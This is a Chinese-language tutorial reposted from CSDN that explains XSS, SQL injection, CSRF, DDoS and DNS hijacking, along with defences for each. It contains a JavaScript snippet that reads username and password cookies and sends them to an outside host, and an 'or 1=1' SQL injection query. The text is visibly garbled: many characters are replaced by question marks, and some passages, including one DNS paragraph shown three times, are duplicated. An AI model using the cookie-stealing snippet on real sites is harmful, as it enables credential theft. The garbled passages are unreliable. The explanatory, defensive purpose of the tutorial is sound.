???XSS?攻擊

• 全稱跨站腳本攻擊?Cross Site Scripting
• 為了與重疊樣式表?CSS?進行區(qū)分，所以換了另一個縮寫名稱?XSS
• XSS攻擊者通過篡改網(wǎng)頁，注入惡意的?HTML?腳本，一般是?javascript，在用戶瀏覽網(wǎng)頁時，控制用戶瀏覽器進行惡意操作的一種攻擊方式
• XSS?攻擊經(jīng)常使用在論壇，博客等應(yīng)用中。攻擊者可以偷取用戶Cookie、密碼等重要數(shù)據(jù)，進而偽造交易、盜取用戶財產(chǎn)、竊取情報等私密信息

• 就像上圖，如果用戶在評論框中輸入的并不是正常的文本，而是一段?javascript?腳本，而后臺又沒對該用戶的數(shù)據(jù)進行處理，直接存入數(shù)據(jù)庫，那么當其他用戶過來訪問該頁面，瀏覽器必然會執(zhí)行這段腳本

• 當然這只是惡趣味，而真正的黑客并不會僅僅滿足這樣的惡趣味，可能更多的是想通過這些?注入腳本，獲取你的?個人信息?，甚至是你的賬號密碼等信息

• 由上圖可知，用戶其實在評論的時候，引入了一個第三方腳本，在這個腳本中獲取你瀏覽器的?cookie?信息，并發(fā)送到指定的接口進行保存處理，這樣你的信息就已經(jīng)泄露了

// attack.js 中的邏輯
var uname = $.cookie('username'); // 獲取賬號
var pwd = $.cookie('password'); // 獲取密碼

// 發(fā)送請求
$('body').appendTo('<script src=`http://autofelix.com/index.php?username=${uname}&password=${pwd}`></script>');

• 在上面邏輯中，腳本中獲取了你的個人信息，并將你的個人信息發(fā)送到后端?php?文件中進行處理保存，這樣你的個人信息就已經(jīng)泄露了，所以杜絕?xss攻擊?在網(wǎng)絡(luò)安全中非常的重要
• 所以后端永遠不要相信用戶提交的數(shù)據(jù)，在接收用戶提交的信息時候，要進行?消毒處理
• 也就是過濾一些特殊的字符，比如?javascript?腳本中的?<>?進行轉(zhuǎn)移?<>?再進行存儲，這樣就能有效的進行?xss?攻擊的預(yù)防
• 另外如果?cookie?中設(shè)置了?HttpOnly?屬性，那么通過?js?腳本將無法讀取到cookie?信息，這樣也能有效的防止?XSS?攻擊竊取?cookie?內(nèi)容

?? SQL 注入

• SQL注入?攻擊指的是攻擊者在?HTTP?請求中注入惡意?SQL?命令，服務(wù)器用請求參數(shù)構(gòu)造數(shù)據(jù)庫?SQL?命令時，惡意?SQL?被一起構(gòu)造，并在數(shù)據(jù)庫中執(zhí)行，以便得到數(shù)據(jù)庫中的感興趣的數(shù)據(jù)或?qū)?shù)據(jù)庫進行讀取、修改、刪除、插入等敏感的操作，從而導(dǎo)致數(shù)據(jù)被隨意篡改
• 但是?SQL注入?攻擊，需要攻擊者對數(shù)據(jù)庫表有所了解才行，比如你的項目?開源?了，不小心公開了數(shù)據(jù)庫的賬號和密碼；另外你的網(wǎng)站上線沒有?關(guān)閉調(diào)試模式，有心者可以網(wǎng)站的根據(jù)錯誤回顯可以猜測表結(jié)構(gòu)；另外還有就是?盲注，也即是很多有心者會盲猜數(shù)據(jù)表結(jié)構(gòu)，但是這種難度最大
• SQL注入?可以通過預(yù)編譯手段進行預(yù)防，綁定參數(shù)是最好的防?SQL?注入方法?，F(xiàn)在流行的框架基本都實現(xiàn)了?SQL預(yù)編譯和?參數(shù)綁定，惡意攻擊的?SQL?會被當做?SQL?的參數(shù)，而不是?SQL?命令被執(zhí)行

# 正常獲取用戶信息的sql
select * from users where id=1

# sql注入了 1 or 1=1，就可以把用戶表中的所有數(shù)據(jù)全部查出，導(dǎo)致數(shù)據(jù)泄露
select * from users where id=1 or 1=1

???CSRF?攻擊

• CSRF?全稱?Cross Site Request Forgery，跨站點請求偽造，攻擊者通過跨站請求，以合法的用戶身份進行非法操作，如轉(zhuǎn)賬交易、發(fā)表評論等。其核心是利用了瀏覽器?Cookie?或服務(wù)器的?Session?策略，盜取用戶的身份信息
• 在打開?A網(wǎng)站?的情況下，另開?Tab頁面?打開惡意?網(wǎng)站B，此時在?B頁面?的?惡意意圖?下，瀏覽器發(fā)起一個對?網(wǎng)站A?的?HTTP?請求
• 因為之前?A網(wǎng)站?已經(jīng)打開了，瀏覽器存有?A網(wǎng)站?中的?Cookie?或其他用于身份認證的信息，這一次被?惡意意圖?的請求，將會自動帶上這些信息，這將會導(dǎo)致身份劫持，造成并非本人意愿的操作結(jié)果
• 而對應(yīng)?CSRF攻擊?的防御策略有：表單token、?驗證碼、Referer 檢測?等

?? DDOS 攻擊

• DDOS?全稱?Distributed Denial of Service，分布式拒絕服務(wù)攻擊。是拒絕服務(wù)攻擊的升級版。拒絕攻擊服務(wù)其實就是讓你的服務(wù)不能正常給用戶提供服務(wù)，DDOS?全稱?Distributed Denial of Service，分布式拒絕服務(wù)攻擊。是拒絕服務(wù)攻擊的升級版。拒絕攻擊服務(wù)其實就是讓你的服務(wù)不能正常給用戶提供服務(wù)
• 在早期發(fā)起?DoS攻擊?是一件很容易的事情，只需要寫個程序讓服務(wù)過載，無暇提供正常服務(wù)即可，也就是一秒中請求服務(wù)多次，將目標服務(wù)器的內(nèi)存跑
• 后來隨著技術(shù)的發(fā)展，現(xiàn)在的服務(wù)器都是分布式，并不是單一服務(wù)器提供服務(wù)，一個服務(wù)背后擁有著是數(shù)不清的?CDN節(jié)點，也是就擁有著數(shù)不清的Web服務(wù)器。想靠單臺服務(wù)器去攻擊這種分布式網(wǎng)絡(luò)，無異于對方以卵擊石?，而且現(xiàn)在很多?DDOS 攻擊?都不是免費的，所以很容易造成偷雞不成蝕把米
• 防御手段：隨著技術(shù)發(fā)展到今天也并不能完全杜絕這種攻擊的出現(xiàn)，只能通過技術(shù)去緩解。其中包括：流量清洗、SYN Cookie?等等

?? DNS 劫持

• 當今互聯(lián)網(wǎng)流量中，以?HTTP／HTTPS?為主的?Web服務(wù)?產(chǎn)生的流量占據(jù)了絕大部分
• Web服務(wù)?發(fā)展的如火如荼，這背后離不開一個默默無聞的大功臣就是域名解析系統(tǒng)，DNS?提供將域名轉(zhuǎn)換成?ip地址?的服務(wù)，每一個域名的解析都要經(jīng)過?DNS?，所以可以看出它的重要性
• 正是因為它的重要性，所以?DNS劫持?很容易被別有用心的人利用
• 早期并沒有考慮太多的安全性，所以導(dǎo)致?DNS?很容易被劫持
• 如果攻擊者篡改?DNS解析?設(shè)置，將域名由正常?IP?指向由攻擊者控制的非法?IP，就會導(dǎo)致我們訪問域名打開的卻不是對應(yīng)的網(wǎng)站，而是一個假冒或者別有用心的網(wǎng)站。這種攻擊手段就是?DNS劫持
• 如果攻擊者篡改?DNS解析?設(shè)置，將域名由正常?IP?指向由攻擊者控制的非法?IP，就會導(dǎo)致我們訪問域名打開的卻不是對應(yīng)的網(wǎng)站，而是一個假冒或者別有用心的網(wǎng)站。這種攻擊手段就是?DNS劫持
• 如果攻擊者篡改?DNS解析?設(shè)置，將域名由正常?IP?指向由攻擊者控制的非法?IP，就會導(dǎo)致我們訪問域名打開的卻不是對應(yīng)的網(wǎng)站，而是一個假冒或者別有用心的網(wǎng)站。這種攻擊手段就是?DNS劫持
• 另外可以?安裝SSL證書。SSL證書具備服務(wù)器身份認證功能，可以使DNS 劫持導(dǎo)致的連接錯誤情況及時被發(fā)現(xiàn)和終止

文章轉(zhuǎn)自CSDN，原作者極客飛兔，版權(quán)歸原作者所有，如有侵權(quán)請聯(lián)系刪除